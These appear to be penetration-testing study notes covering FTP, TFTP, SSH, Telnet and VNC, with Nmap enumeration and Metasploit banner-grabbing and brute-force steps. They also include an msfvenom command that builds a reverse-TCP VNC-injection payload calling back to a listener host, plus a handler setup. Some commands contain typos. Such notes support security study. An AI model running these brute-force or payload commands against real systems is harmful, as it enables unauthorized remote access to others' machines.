PROTOCOLS

1. PROTOCOLS - DEFINITION, ENUMERATION AND VAPT HIERARCHY
2. =======================================================
3.  
4. 1. FTP
5. =======
6.  
7. FTP is an acronym that stands for File Transfer Protocol. An FTP client is a program that allows you to easily move files from one computer to another.
8. An FTP server listens on TCP port 21 for incoming connection requests from FTP clients. The server uses this port to control the connection and opens a separate port for transferring file data.
9. FTP supports two modes of data transfer: plain text (ASCII), and binary. You set the mode in the FTP client. A common error when using FTP is attempting to transfer a binary file (such as a program or music file) while in text mode, causing the transferred file to be unusable.
10.  
11. Enumeration via Nmap
12.  
13. > nmap -Pn -sS -A -p21 TargetIP
14.  
15. Attacks on FTP
16.  
17. > Banner Grabbing : Reconaissance technique used to gain information about a computer system on a network and the services running on its open ports.
18.  
19. MSF > use auxiliary/scanner/ftp/ftp_version
20. > set rhosts
21. > exploit
22.  
23. > Brute Forcing : Brute forcing is a trial and error method used by application programs to decode encrypted data such as passwords by hit and trial through exhaustive effort by employing intellectual strategies.
24.  
25. MSF > use auxiliary/scanner/ftp/ftp_login
26. > set rhosts
27. > set user_file rockyou.txt
28. > set pass_file rockyou.txt
29. > set stop_on_success true
30. > exploit
31.  
32.  
33. 2. TFTP
34. =======
35.  
36. TFTP stands for Trivial File Transfer Protocol. It's a technology for transferring files between network devices and is a simplified version of File Transfer Protocol.
37. Today, TFTP usually found on routers as consumer ​broadband routers and commercial network routers.
38.  
39.  
40. TFTP can also be used to remotely start a computer and back up network or router configuration files.
41.  
42. TFTP relies on UDP for transporting data with UDP port number 69.
43.  
44. Diff between TFTP and FTP
45. - Unlike FTP, TFTP has no login feature, so it doesn't prompt for a username and password. Avoid using TFTP to share sensitive files — you can't protect them or audit their access.
46. - Listing, renaming, and deleting files over TFTP is usually not allowed.
47.  
48. Enumeration via nmap
49. > nmap -Pn -sU -p69 --script tftp-enum TargetIP
50.  
51.  
52. sftp = ftp+sshv2.0
53.  
54.  
55. 3. SSH
56. ======
57.  
58. SSH stands for "Secure Shell". SSH uses port 22 to connect your computer to another computer on the internet. Network administrators will use this technique so they can remote login / remote control a business server in some other part of the city.
59.  
60. Examples of using SSH:
61.  
62. - Your email administrator needs to reboot the company email server from his home.
63. - Your network administrator needs to reset your office password while she is sitting in a different office or is away on a conference.
64.  
65. In short, Secure Socket Shell is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.
66.  
67.  
68.  
69. - apt-get install openssh-server
70. -
71.  
72. Enumeration using Nmap
73.  
74. > nmap -Pn -sU -p22 -A TargetIP
75.  
76. Attacks on SSH
77.  
78. > Banner Grabbing
79. MSF > use/auxiliary/scanner/ssh/ssh_version
80. > set rhosts
81. > set rport
82. > exploit
83.  
84. > Brute Forcing on ssh login
85. MSF > use/auxiliary/scanner/ssh/ssh_login
86. > set rhosts
87. > set rport
88. > set userpass_file
89. > exploit
90.  
91.  
92. 4. TELNET
93. ==========
94.  
95. Telnet refers to a network virtual terminal protocol. The acronym comes from "teletype network," "terminal network," or "telecommunications network," depending on which source you believe, and it was built to be a form of remote control to manage mainframe computers from distant terminals.
96.  
97. In time, insecure Telnet evolved into a newer network protocol called Secure Socket Shell (SSH), which modern network administrators use to manage Linux and Unix computers from a distance. SSH provides strong authentication and secure encrypted data communications between computers over an insecure network.
98.  
99. Enumeration using Nmap
100.  
101. > nmap -sSV -p23 TargetIP
102.  
103. Main disadvantage of using Telnet : It sends user credentials into plain text.
104.  
105.  
106. 5. VNC
107. =======
108.  
109. VNC (Virtual Network Computing) is a technology for remote desktop sharing, a form of remote access on computer networks. VNC enables the visual desktop display of one computer to be remotely viewed and controlled over a network connection.
110.  
111. Remote desktop technology like VNC is useful on home computer networks, allowing someone to access their desktops from another part of the house or while traveling. It is also useful for network administrators in business environments, such as Information Technology (IT) departments who need to remotely troubleshoot employees' systems.
112.  
113.  
114. Attacking Methods
115. ==================
116.  
117. msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > vnc.exe
118.  
119. --
120.  
121. use exploitmulti/handler
122. msf exploit(handler) > set payload windows/vncinject/reverse_tcp
123. msf exploit(handler) > set lhost
124. msf exploit(handler) > set lport
125. msf exploit(handler) > set viewonly false
126. msf exploit(handler) > run
127.  
128.  
129. --------------------
130.  
131.  
132. SMB ETERNAL BIBLE - https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html